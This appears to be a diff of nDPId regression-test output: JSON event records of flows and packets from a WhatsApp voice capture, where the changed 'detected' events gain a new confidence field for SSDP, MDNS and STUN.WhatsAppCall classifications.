+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455704557,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1561455705874,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1561455705874,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1561455705874,"pkt":"AQBeAAD7kLkxKPrKCABFAABNhSMAAP8RkszAqAIM4AAA+xTpFOkAOcRFAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAyAAQhfYWlycGxhecASAAyAAQ=="}
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1561455705874,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1561455705874,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1561455705874,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1561455705874,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"ts_msec":1561455705874,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5+sIAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"}
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1561455705874,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
+00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455705874,"flow_last_seen":1561455705874,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1561455705874,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1561455706881,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1561455706881,"pkt":"AQBeAAD7kLkxKPrKCABFAABNdOIAAP8Row3AqAIM4AAA+xTpFOkAOUTGAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAwAAQhfYWlycGxhecASAAwAAQ=="}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1561455706881,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"ts_msec":1561455706881,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5e0MAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADAABCF9haXJwbGF5wBIADAAB"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1561455706912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACav+gAAEARgnnAqAIMHw1WMNwIDZYAhhEmAAMAaiESpEKmZ0918K0sABMVszZAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1561455706912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACaKEAAAEARGiLAqAIMHw1WMNwIDZYAhhElAAMAaiESpEKmZ0918K0sABMVszdAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1561455706912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACa\/egAAEARKEbAqAIMuTzYM9wIDZYAhvTwAAMAaiESpEKmZ0918K0sABMVszhAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1561455706912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACaQnoAAEAR47TAqAIMuTzYM9wIDZYAhvTvAAMAaiESpEKmZ0918K0sABMVszlAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1561455706913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACaTo8AAEARCe\/AqAIMnfDBMNwIDZYAhic+AAMAaiESpEKmZ0918K0sABMVszpAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1561455706913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACapTEAAEARs0zAqAIMnfDBMNwIDZYAhic9AAMAaiESpEKmZ0918K0sABMVsztAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1561455706913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACa5uYAAEARXUvAqAIMszzAMNwIDZYAhhLwAAMAaiESpEKmZ0918K0sABMVszxAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1561455706913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACaa6sAAEAR2IbAqAIMszzAMNwIDZYAhhLvAAMAaiESpEKmZ0918K0sABMVsz1AAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706914,"flow_last_seen":1561455706914,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706914,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1561455706914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706914,"pkt":"xiwDYGpkkLkxKPrKCABFAACa6jAAAEARaz\/AqAIMnfDEPtwIDZYAhiQsAAMAaiESpEKmZ0918K0sABMVsz5AAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706914,"flow_last_seen":1561455706914,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706914,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706914,"flow_last_seen":1561455706914,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455706914,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1561455706914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455706914,"pkt":"xiwDYGpkkLkxKPrKCABFAACa\/isAAEARV0TAqAIMnfDEPtwIDZYAhiQrAAMAaiESpEKmZ0918K0sABMVsz9AAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1561455706925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455706925,"pkt":"kLkxKPrKxiwDYGpkCABFAABIJPUAAFQRCb8fDVYwwKgCDA2W3AgANMY6AQMAGCESpEKmZ0918K0sABMVszYAIAAIAAHthnGmBnJAAgAIAAABa44DQzM="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1561455706935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455706935,"pkt":"kLkxKPrKxiwDYGpkCABFAABIB5sAAFMROyed8MQ+wKgCDA2W3AgANNk5AQMAGCESpEKmZ0918K0sABMVsz4AIAAIAAHthnGmBnJAAgAIAAABa44DQzo="}
@@ -83,85 +83,85 @@
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1561455706945,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455706945,"pkt":"kLkxKPrKxiwDYGpkCABFAABIKZAAAFMR6fC5PNgzwKgCDA2W3AgANKn2AQMAGCESpEKmZ0918K0sABMVszgAIAAIAAHthnGmBnJAAgAIAAABa44DQ0I="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706979,"flow_last_seen":1561455706979,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455706979,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1561455706979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1561455706979,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClm6MAAAIRafbAqAIM7\/\/\/+vzMB2wAkbYGTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
